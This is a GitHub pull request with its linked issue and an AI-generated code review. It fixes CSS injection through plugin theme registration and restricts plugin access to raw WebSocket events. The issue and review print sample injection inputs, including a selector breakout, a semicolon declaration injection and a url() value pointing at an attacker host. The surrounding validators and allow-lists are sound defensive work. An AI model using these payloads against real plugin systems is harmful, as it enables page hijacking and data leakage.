### PR TITLE
fix(security): sanitize plugin theme CSS injection and scope SDK socket access

### LINKED ISSUE #184: Security: CSS injection via theme registration + unrestricted socket access in plugin SDK
## Summary

Two security concerns in the frontend plugin system that are acceptable for bundled-only plugins but become critical if third-party plugins are ever supported.

## Issue 1: CSS injection via theme registration

**File:** `apps/web/src/lib/plugin-theme-injector.ts:36`

Theme IDs and CSS property values are interpolated raw into CSS strings without any sanitization:

```typescript
const css = `:root.${themeId} {\n${declarations}\n}`;
```

A plugin could register a theme with a crafted ID like:
```
a { } * { display:none } .x
```
This would produce valid CSS that breaks out of the scoped selector and injects arbitrary global styles.

Similarly, CSS property values are unsanitized — a value containing `}` could break out of the declaration block.

### Recommended Fix
- Validate theme IDs match `/^[a-z0-9-]+$/` before CSS interpolation (same pattern as storage plugin ID validation)
- Strip `{`, `}`, `;` from CSS property values, or use a CSS sanitizer

## Issue 2: Unrestricted socket access in plugin SDK

**File:** `apps/web/src/lib/plugin-sdk.ts:18-20`

The SDK exports `getSocket`, `emitAsync`, `emitWithErrorHandling`, and `emitWithSuccessHandling`, giving plugins direct, unscoped access to the raw WebSocket. Any plugin can emit any event to the backend (e.g., `session:kill`, `workspace:delete`).

### Recommended Fix
- For third-party plugin support: provide a scoped emit function that restricts event namespaces to `plugin:*`
- Or remove raw socket access from the SDK entirely and provide higher-level APIs

## Current Risk Level

**Low** for current bundled-only model. **Critical** if third-party plugins are supported.

## Found During

Plugin system deep architecture review

### PR DESCRIPTION
**Pull request by Shironex**
## Summary

Closes #184

- **CSS injection prevention**: Validate theme IDs (`/^[a-zA-Z][a-zA-Z0-9_-]{0,100}$/`), CSS property keys (`/^--[a-zA-Z][a-zA-Z0-9-]*$/`), and values (reject `{`, `}`, `</style`). `injectThemeStyles` now returns `boolean` and silently filters invalid properties. `removeThemeStyles` uses `CSS.escape()` for safe attribute selectors.
- **Scoped plugin SDK socket access**: Replaced raw `getSocket` export with `isSocketConnected()`. All `emitAsync`/`emitWithErrorHandling`/`emitWithSuccessHandling` exports now validate events against an allow-list (`plugin:*`, `usage:*`), blocking dangerous namespaces like `session:*`, `terminal:*`, `git:*`.
- **Bonus**: Fixed pre-existing cross-platform test failure in `provider-claude` CLI detection (Unix path test missing platform mock).

## Test plan

- [x] 23 new tests for `plugin-theme-injector` (valid/invalid theme IDs, CSS property keys, values, injection/removal)
- [x] 15 new tests for `plugin-sdk` (allowed/blocked event namespaces, `isSocketConnected`)
- [x] Full test suite passes (3,031 tests across all packages)
- [x] Typecheck passes across all packages
- [ ] Manual: verify Codex dark theme still applies correctly (uses `oklch()` values)

🤖 Generated with [Claude Code](https://claude.com/claude-code)

## Summary by CodeRabbit

* **New Features**
  * Enhanced plugin theme system with input validation to prevent invalid configurations.
  * Improved socket event handling with stricter event-name validation for plugin communications.

* **Improvements**
  * Plugin registration now validates theme IDs and CSS properties before applying them, preventing invalid registrations.
  * Safer socket connection checking across the plugin system.

* **Tests**
  * Added comprehensive test coverage for plugin SDK and theme injection systems.

### CODE REVIEW

File: apps/web/src/lib/plugin-theme-injector.ts [hunk 1]
```diff
@@ -7,13 +7,58 @@
...
 const THEME_ATTR = 'data-plugin-theme';
 
+/** Valid theme ID: starts with a letter, alphanumeric/hyphens/underscores, max 100 chars. */
+const VALID_THEME_ID = /^[a-zA-Z][a-zA-Z0-9_-]{0,100}$/;
+
+/** Valid CSS custom property key: must start with `--` followed by a letter and alphanumeric/hyphens. */
+const VALID_CSS_PROPERTY_KEY = /^--[a-zA-Z][a-zA-Z0-9-]*$/;
+
+/** Characters that could break out of a CSS declaration block or style element. */
+const DANGEROUS_CSS_VALUE = /[{}]|<\/style/i;
```
Comment (Shironex) [inline apps/web/src/lib/plugin-theme-injector.ts]: > [!IMPORTANT]
> **Minor - Security:** CSS value sanitization does not block semicolons, allowing declaration injection

The dangerous CSS value check blocks `{}` and `</style` but does not block semicolons (`;`). A malicious plugin could inject additional CSS declarations within the same rule block, e.g., `--safe` value of `red; position: fixed; top: 0; left: 0; width: 100vw; height: 100vh; z-index: 9999; background: white` — effectively hijacking the page's root styling when the theme is active. While this is scoped to `:root.{themeId}` (only active when the theme class is applied), the intention of this PR is to limit CSS properties to only custom properties (`--*`), so allowing arbitrary property injection via semicolons partially undermines the protection.

**Problematic code:**
```typescript
const DANGEROUS_CSS_VALUE = /[{}]|<\/style/i;
```

**Suggested fix:**
```diff
const DANGEROUS_CSS_VALUE = /[{};]|<\/style/i;
// Or for a more targeted approach, reject values containing ':'  
// followed by what looks like a property name after a semicolon:
// const DANGEROUS_CSS_VALUE = /[{}]|<\/style|;\s*[a-zA-Z-]+\s*:/i;
```

**Review by Shironex — COMMENTED** [review]
## GitChorus AI Review

This is a well-structured security hardening PR that addresses two real vulnerabilities: CSS injection via plugin themes and unrestricted socket access from the plugin SDK. The implementation is thoughtful — theme ID validation is consistent with the existing `theme-persistence.ts` regex, the socket scoping uses a clean allow-list pattern, and the test coverage is comprehensive (38 new tests). The `injectThemeStyles` return type change to `boolean` is a nice API improvement that allows callers to handle validation failures gracefully.

The main substantive concern is that the CSS value sanitization (`DANGEROUS_CSS_VALUE`) blocks `{}` and `</style` but does not block semicolons, which allows declaration injection within the same rule block. A malicious plugin could inject arbitrary CSS properties (not just custom properties) on `:root.{themeId}`. While the blast radius is limited (the injected styles only apply when the theme class is set), this partially undermines the goal of restricting plugins to only CSS custom property values. Blocking `url()` would also add defense-in-depth against potential resource loading.

The bonus fix for the cross-platform test failure is correct, though the adjacent Windows test has the same cleanup vulnerability that could be fixed in the same pass.

Overall, this is solid, well-tested security work that meaningfully reduces attack surface. The remaining gaps are edge cases rather than fundamental design issues.

**Quality Score:** 8/10 ⭐⭐⭐⭐⭐⭐⭐⭐☆☆

### Findings Summary

| # | Severity | Category | Finding | Location |
|---|----------|----------|---------|----------|
| 1 | 🟡 Minor | Security | CSS value sanitization does not block semicolons, allowing declaration injection | `plugin-theme-injector.ts:26` |
| 2 | 🟡 Minor | Security | CSS value sanitization does not block url() for defense-in-depth | `plugin-theme-injector.ts:26` |
| 3 | 🔵 Nit | Logic | Theme ID regex allows 101 chars but comment says "max 100" | `plugin-theme-injector.ts:20` |
| 4 | 🔵 Nit | Security | Error message includes unsanitized event name (very low risk) | `plugin-sdk.ts:29` |
| 5 | 🔵 Nit | Style | removeThemeStyles fallback path trusts caller to pass validated IDs | `plugin-theme-injector.ts:116` |
| 6 | 🔵 Nit | Codebase-fit | Windows platform test lacks try/finally for cleanup (inconsistent with Unix fix) | `cli-detection.service.spec.ts:107` |

---
*via [GitChorus](https://github.com/Shironex/gitchorus)*

File: apps/web/src/lib/plugin-theme-injector.ts (hunk 1 above)
Comment (Shironex) [inline apps/web/src/lib/plugin-theme-injector.ts]: > [!IMPORTANT]
> **Minor - Security:** CSS value sanitization does not block url() for defense-in-depth

The CSS value sanitizer does not block `url()` in values. A malicious plugin theme could set a CSS custom property value to something like `url(https://attacker.com/log?data=...)` or `url(data:...)`. While custom properties with `url()` values don't automatically trigger network requests (they need to be referenced via `var()` in a context that loads URLs), if any built-in CSS uses `var(--background)` in a `background-image` or similar property, an attacker could trigger external resource loading. This is a defense-in-depth concern — theme custom properties should only contain color values, dimensions, and similar.

**Problematic code:**
```typescript
const DANGEROUS_CSS_VALUE = /[{}]|<\/style/i;
```

**Suggested fix:**
```diff
const DANGEROUS_CSS_VALUE = /[{}]|<\/style|url\s*\(/i;
// Block url() to prevent potential external resource loading
```

File: apps/web/src/lib/plugin-theme-injector.ts [hunk 2]
```diff
@@ -7,13 +7,58 @@
...
+ * All inputs are validated/sanitized to prevent CSS injection attacks.
  */
 
 import { ALL_THEMES } from '@omniscribe/shared';
 
 /** Attribute used to identify plugin theme style elements in the DOM */
 const THEME_ATTR = 'data-plugin-theme';
 
+/** Valid theme ID: starts with a letter, alphanumeric/hyphens/underscores, max 100 chars. */
+const VALID_THEME_ID = /^[a-zA-Z][a-zA-Z0-9_-]{0,100}$/;
```
Comment (Shironex) [inline apps/web/src/lib/plugin-theme-injector.ts]: > [!NOTE]
> **Nit - Logic:** Theme ID regex allows 101 chars but comment says "max 100"

The JSDoc comment says "max 100 chars" but the regex allows up to 101 characters (1 mandatory first char + up to 100 additional). The same regex exists in `theme-persistence.ts` so they are consistent, but the documentation is slightly misleading. The test `'a' + 'b'.repeat(101)` (102 chars) passes correctly because it exceeds even 101, so the tests still work — it's just the comment that's inaccurate.

**Problematic code:**
```typescript
const VALID_THEME_ID = /^[a-zA-Z][a-zA-Z0-9_-]{0,100}$/;
```

**Suggested fix:**
```diff
/** Valid theme ID: starts with a letter, alphanumeric/hyphens/underscores, max 101 chars total. */
const VALID_THEME_ID = /^[a-zA-Z][a-zA-Z0-9_-]{0,100}$/;

// Or if you truly want max 100 chars:
const VALID_THEME_ID = /^[a-zA-Z][a-zA-Z0-9_-]{0,99}$/;
```

File: apps/web/src/lib/plugin-sdk.ts [hunk 3]
```diff
@@ -4,21 +4,91 @@
...
+import type { EmitOptions, ErrorResponse, SuccessResponse } from './socketHelpers';
+
+/** Event namespace prefixes that plugins are allowed to emit. */
+const ALLOWED_EVENT_PREFIXES = ['plugin:', 'usage:'] as const;
+
+function assertAllowedEvent(event: string): void {
+  const allowed = ALLOWED_EVENT_PREFIXES.some(prefix => event.startsWith(prefix));
+  if (!allowed) {
+    throw new Error(
+      `Plugin SDK: event "${event}" is not allowed. Plugins may only emit events with these prefixes: ${ALLOWED_EVENT_PREFIXES.join(', ')}`
```
Comment (Shironex) [inline apps/web/src/lib/plugin-sdk.ts]: > [!NOTE]
> **Nit - Security:** Error message includes unsanitized event name (very low risk)

The error message includes the raw user-supplied event name via string interpolation. While this is a `throw` (not DOM injection or logging to HTML), if this error message is ever displayed in the UI or logged with structured logging that doesn't escape, it could be an injection vector. This is extremely low risk since it's a JS Error object, but for defense-in-depth you could truncate the event name.

**Problematic code:**
```typescript
throw new Error(
  `Plugin SDK: event "${event}" is not allowed. Plugins may only emit events with these prefixes: ${ALLOWED_EVENT_PREFIXES.join(', ')}`
);
```

**Suggested fix:**
```diff
const safeEvent = event.length > 100 ? event.slice(0, 100) + '...' : event;
throw new Error(
  `Plugin SDK: event "${safeEvent}" is not allowed. Plugins may only emit events with these prefixes: ${ALLOWED_EVENT_PREFIXES.join(', ')}`
);
```

File: apps/web/src/lib/plugin-theme-injector.ts [hunk 4]
```diff
@@ -22,35 +67,54 @@ const THEME_ATTR = 'data-plugin-theme';
...
+ * attribute and removes it from the DOM. Uses CSS.escape() for safe
+ * attribute selector construction.
  *
  * @param themeId - The theme identifier to remove styles for
  */
 export function removeThemeStyles(themeId: string): void {
-  const existing = document.head.querySelector(`style[${THEME_ATTR}="${themeId}"]`);
+  // Use CSS.escape when available (browsers), fall back to validated ID (jsdom/tests).
+  // Since theme IDs are validated before injection, the fallback is safe.
+  const escaped = typeof CSS !== 'undefined' && CSS.escape ? CSS.escape(themeId) : themeId;
```
Comment (Shironex) [inline apps/web/src/lib/plugin-theme-injector.ts]: > [!NOTE]
> **Nit - Style:** removeThemeStyles fallback path trusts caller to pass validated IDs

The fallback to raw `themeId` when `CSS.escape` is unavailable (jsdom in tests) is noted as safe because 'theme IDs are validated before injection'. However, `removeThemeStyles` is a public export and could be called with arbitrary strings from outside the validated injection path. The PR's `deactivateFrontendPlugin` calls it with already-validated IDs from the store, so this is safe in practice, but the function's contract doesn't enforce that. A small comment noting this assumption or an early-return validation check would strengthen robustness.

**Problematic code:**
```typescript
const escaped = typeof CSS !== 'undefined' && CSS.escape ? CSS.escape(themeId) : themeId;
```

**Suggested fix:**
```diff
export function removeThemeStyles(themeId: string): void {
  // Validate even for removal — only process IDs that could have been injected
  if (!isValidThemeId(themeId)) return;

  const escaped = typeof CSS !== 'undefined' && CSS.escape ? CSS.escape(themeId) : themeId;
  const existing = document.head.querySelector(`style[${THEME_ATTR}="${escaped}"]`);
  if (existing) {
    existing.remove();
  }
}
```
